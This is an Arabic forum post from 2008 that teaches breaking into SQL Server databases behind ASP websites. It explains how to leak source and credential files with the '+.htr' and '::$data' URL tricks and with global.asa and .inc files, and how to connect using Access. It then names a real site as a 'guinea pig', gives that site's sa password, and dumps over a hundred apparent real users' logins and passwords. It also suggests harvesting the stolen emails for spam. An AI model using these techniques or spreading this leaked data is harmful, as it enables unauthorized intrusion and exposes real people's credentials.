اختراق قواعد البيانات

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

اختراق قواعد البيانات

مُساهمة من طرف Hacker في الخميس أغسطس 14, 2008 3:21 am

تعلم اختراق SQL مع فئران التجارب
اخواني الكرام ....
في هذا الدرس سوف نتحدث عن بعض الطرق او المهارات في إختراق الاس كيو ال انا اعتقد ان هذا الملف ليس بالمستوى المطلوب
لكنها محاولات بسيطة ارجوا ان تفيد الجميع .

س :في البداية ماهي الاس كيو ال ( SQL )؟؟

الاس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب ASP هي صفحات تسحب بياناتها
من قاعدة SQL وصفحات ASP ممكن ان تكون كنز من المعلومات لاختراق قواعد بيانات SQL وهذا ماسوف اشير اليه لاحقا ، و SQL
تتنصت على البورت 1433
ايضا مااريد ان اخبرك به ان ال SQL قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على عدد من الجداول يمكن
ان تتصور كبرقواعد بيانات SQL والعدد الكبير من البيانات التى تحتويها .

س : مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات SQL ؟
هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى لا اقصد منتديات PHP بل منتديات ASP في الغالب سوف تحصل على جميع اسماء
المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلاحيات لم تكن تحلم بها ، اما اذا كان الموقع يحتوي على ميزة
قائمة المراسلات فسوف تحصل على اعداد خيالية من الايميلات ، عندها قم بانشاء شركة للدعاية والاعلان وسوف تصبح ثريا اذن لاتنسى LinuxRay_
توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص - ارقام هواتف - عناوين - تورايخ الميلاد ، ممكن ان تصبح Administrator .


اعرف انه قد اصابك الملل الان لكن استعد نشاطك من جديد فالطريق مازال طويلا ...


س : مالذي تحتاجة للدخول على قواعد بيانات SQL ؟

تحتاج فقط لل User Name و Passwd

س : من اين احصل على اسم المستخدم وكلمة المرور ؟

هناك طرق عديدة للحصول على User name and Passwd منها كما اسلف صفحات ال ASP وملفات اخرى من نوع *.sql هناك ثغرات كثير يمكن
ان تحصل منها على كلمات المرور مثل ثغرة +.htr
كيف تستخدم هذه الثغرة :


http://target/page.asp+.htr
target : الموقع الهدف
Page : صفحة asp
+.htr : الثغرة


هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لاتحتوي على اي حرف .... اعرف انك سوف تتساءل مالفائدة اذن منها الفائدة هو
خلف هذه الصفحة البيضاء اذهب الى View Source لكي ترى اوامر البرمجة الخاصة ب ASP التى لايمكن لك ان تراها في الوضع العادي : مثل


<%

Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"


%>
-----------------------------------------------------------------
في الكود السابق ترى ان اسم المستخدم هو _LinuxRay
وكلمة السر هي 6666666
-----------------------------------------------------------------



الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ASP مثل الاتي :

AMicrosoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/filename.inc, line 5

هناك ملف ينتهي بامتداد *.inc هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم المستخدم وكلمة المرور
اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .


وممكن ان ترى مثل هذا الامر في صفحة ASP
عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف database.inc

<!--#include file = "database.inc"-->


وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات

global.asa
++global.asa
beforemilion-global.asa
-global.asa
milion.sql
global-direct.asa

ليس من الضرورة ان تكون الملفات بهذه الاسماء لكن هذا هو المعتاد عليه من قبل مبرمجين SQL

وكل ماعليك فعله ان تكتب اسم الصفحة مثل الاتي :

global.asa+.htr

هناك ثغرة قديمة في IIS 3 وهي ان تضيف بعد صفحة ASP هذا الرمز ::$data كما يلي
file.asp::$data
هذه الثغرة لاتعمل الا على IIS 3 فلا تتعب نفسك بتطبيقها فقط للعلم لا اكثر .


لقد اقتربنا من النهاية ... ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟

بعدها الدخول على قاعدة ال SQL !!

هناك عدة برامج تدخل على قاعدة البينات انا استخدم Visual interdev 6.0 لكني مازلت افضل استخدام البرنامج السهل ACCESS 2000


كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة
File
اختر
New
ومن قائمة الملفات الجديدة اختار
Project (Exiting Data)
اي مشروع قاعدة بيانات موجودة .
سيظهر لك مربع لانشاء الملف اختر
Create
اي انشاء

الان سترى مربع
Data Link Properties

تحتاج فقط لثلاث معلومات اسم الموقع او الاي بي - اسم المستخدم - كلمة المرور

1 - ادخل اسم الموقع في صندوق Select or enter server name

2 - اسم المستخدم في User Name

3 - كلمة السر Password


ملاحظة ( قم بإزالة الصح من مربع Blank Password)

اضغط في البداية على Test Connection في الاسفل لاختبار الاتصال بقاعدة البيانات اذا رأيت هذه العبارة Test Connection Succeeded
فمعناه ان الاتصال بقاعدة البيانات تم بنجاح.
يمكنك الان ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :
Select the data base on the server
واضغط على OK او موافق .
الصورة :
http://www.geocities.com/ags2999/SQL.gif

فأر التجارب :

موقع http://www.itsalat.com

1 - User name : sa Passwd : sp2000

هذا فأر على الطاير شبك على قاعدة البيانات واحصل على مايلي :-

Login ID Name PassWord Mail_Pass New Pass
mem99999 -=MEM=- mem77777 mem77777
salmannet ٍSaLMaNnet ssalmanz esctabsh
rrrwxw (الخاطف) 0195 0195
العجمي :العجمي 6559350 6559350
so_so ????? 123456 147258
bbass007 ][ Sultan jeddaH ][ 123456 123456
smslove ][wohdane][ 22474722 2247472
sadness_way ©-=«§âdn駧_wày»=-© 19736842 19736842
$$$$ 0000 16652 16652
055111111 055111111 05511111 05511111
badr saleh 11 1111 1111
saeed13 12345 12345 12345
bahrain 3333 lvdl lvdl
al3asal 3asal lolo1850 LOLO1850
3mry 3mryAali hoha1430 3212
BOM BOM 4youbaby fahad fahad
hasd a 39011
merssal a 232313 232313
alaseeri a 0557208 05572082
ksavip A aziz330 azizaziz
mutaleb77 A Mutaleb Alsalam ama77 alsalam7
rayan2002 a.alamoudi 68766110 6611
a.madi a.madi 17151715 15171517
SALTOONI A/M AL SEMIERY SHAHINAH SHAHINAH
maxonesa a7mad antonio شىفخىهخ
ALJWWAL AAA ASDF AMS6651
aaa99 aaaa 857549 857549
asasas aaaa sssss 98765432
riyadhmoon AAAH ironroad هقخىقخشي
aais aais 01478569 01478569
alkhalaf aalkhalaf 8787 8787
a_almutairi aamer www1980 mnkaaha1
aas99 aas 001991 199100
newoldam ab 260751 260751
mrzzrm abad 55775595 55775595
abadey abadey .ivhk زهران
سيد الجحيم abadi 8888 8844
abadi1b1 abadi 05454141 05454141
abdulhadi abadi 17301000 17301000
cobra911 abadi 11562070 55599965
abandy abandy 693752 693752
abbasqulaten Abbas Hashim Sharif asdfghjk asdfghjk
a_aldribi abbodi 112233 112233
5/9/2001 abcd 201079 201079
qatarsniper abd 5861658a 5861658a
abdts abd al rahiem sasasasa sasasasa
abdelrhman Abd elrhman qazwsx qazwsx
alsuhime abdalaziz 055499
welah_291 abdalkarim wwg291 wwg291
mhuom abdallh koko KOKO
AceVentura75 abdalrahman 9299 9299
5861658 ABDALRAHMAN 5861658a 5861658a
DR.SEEN abdalraof 19444 19444
alsalh5 abdalrhman ab55n77 شلاي55شم
aburhmn abdarhman 6478 5990
haffar abde-hakim haffar lina
abdoh10 abdel aty freebigm freebigm
arajab Abdelhady Rajab hadeel99 hadeel99
abdelrahman abdelrahman hosam abdo abdo
abdelsalam7 abdelsalam abdo abdo
abdllah abdllah hglksd hgukd]
Selvadore abdm makssima makssima
al7airan abdo 62385745 62385745
wwx abdo 05418852 4283227
abdoon abdoon fhd gof 4410 4410
lion2000 abdoooo 4910952 4910952
SAHAM ABDUAZEZ 67942921 67942921
aras_stc abdul r hman d. alshahri aras9995 aras9995
fffaaattt abdulah 258258 258258
mutib abdulah 12345678 2255
abadi2001 abdulah 5921874 شئسا1874
aa_122000 abdulahh hill9416 0334
aln6ool abdulaziz @0551322 @0551322 @0551322
aturki abdulaziz noaf التركي
abohagar abdulaziz 0258 0258
ayat abdulaziz 1191 0123
ABOOO ABDULAZIZ ABDH2001 ABOOOO
arahim Abdulaziz S. Rahim ar913547 ar913547
abasit2 abdulbasit e.m. bukhari a5h1 ش5ا1
history123 abdulelah abdulela abdulela
alsamman abdulellah 12345678
mosa2 abdulgader 123654 123654
ghani abdulghani afmafmaf afmafmaf
almaee abdulghani abd123 شلاي123
meedo Abdulhameed 41900246 41900246
902 Abdulhameed 4444 902
aka69 abdulla 5569 5569
abdullah abdullah abdullah abdullah
doodi5000 Abdullah 5000 5000
asmb2000 abdullah 12345678 12345678
abo fahad abdullah zxcv ضصثق0368
abdullahae abdullah 6642517q 6642517ض
breed Abdullah zzzzz ئئئئئ
kokoooo abdullah 2264539 jamel
a_homyyed abdullah yvhl12 غرام12
as_1399 abdullah 12301230 12301230
khawaji abdullah jamel 2264539
hunter911 abdullah samop111 سشةخح11
talas abdullah 55775595 55775595
qo45 abdullah abdullah abdullah
AbdullahN Abdullah anu262 anu262
aldhayabi abdullah alzaeem SAMI
abd2121 abdullah 112233 112233
adelaih abdullah 852909 852909
boayman abdullah 14338 14338
fshh abdullah 123456 khaled
abullah_tk abdullah 0143 0143
ab_alzahrani abdullah 1234567 22224444
amayouf Abdullah 464432 464432
alsultan966 abdullah 0000 0000
abad4y abdullah 6935a 6935a
MY150 ABDULLAH LUJAIN 1978
abduj2000 Abdullah 98120145 98120145
aoz31 abdullah abdullah 3244
abdullah5503 abdullah.f.h 12345 2786
att00 abdullh 4768890 4768890
abodeeifkhid abdullh khidjpfu lahugjpf
alshamrani abdullrahman 001397 001397
jibarah abdulmohsen 8466aaj 1112aaj
abiesa54 abdulraheem Mohamed Eisa rahimisa rahimisa
suliame abdulrahman suliame suliame
hamzi abdulrahman 10203040 10203040
a_seiamy Abdulrahman net2me net2me
almaawi abdulrahman razan200 razan200
abadirahaf abdulrauoof 05433345 05433345
azzaz2000 abdulrhman 54800888 54800888
bhri2000 Abdulrrsoul 1212 1212
hala2000 abdulslam amr30 amr30 aammrr30
abuferas3000 abdulwahab 52230633 5223063
dhpip abdurhim algamdi 1390 1390
assuhaim abdurrahman mawadda mawadda
futureman abed 123321 05495996
algareeb abed شلاثثق abeer
abednm abed el-ghany najy basmaahm basmaahm
abeerbmw abeer 13861386 13861386
abeer hawari abeer 24041976 heart4ce
abeeir abeer 12345678 12345678
3aboory Abeer 2125 1011
bosah abeer s9s9s9s9 s9s9s9s9
abm ABM 54526286 54526286
almohoob abo khaled 26039 260390
aayyeedd abo razan ayed99 شغثي99
secport Abo.Mubarak am4146 am4146
aboahmad_99 aboahmad 1997 60424
sd90 abobsher 99779070 77999070
bake2me abod hamad welcome welcome
abofahd2000 abofahd 05524898 05524898
aboalfahd abofahd 8677 8677
abomohnd abomohnd 1391 1391

بواسطة:حامدمختار

_________________
لاــ الــه الاــ الـلـــه مــحــمد رســـــول الــلــه
avatar
Hacker

عدد المساهمات : 49
تاريخ التسجيل : 11/08/2007
العمر : 27
الموقع : www.v99x.com

معاينة صفحة البيانات الشخصي للعضو http://www.xp10.cc

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى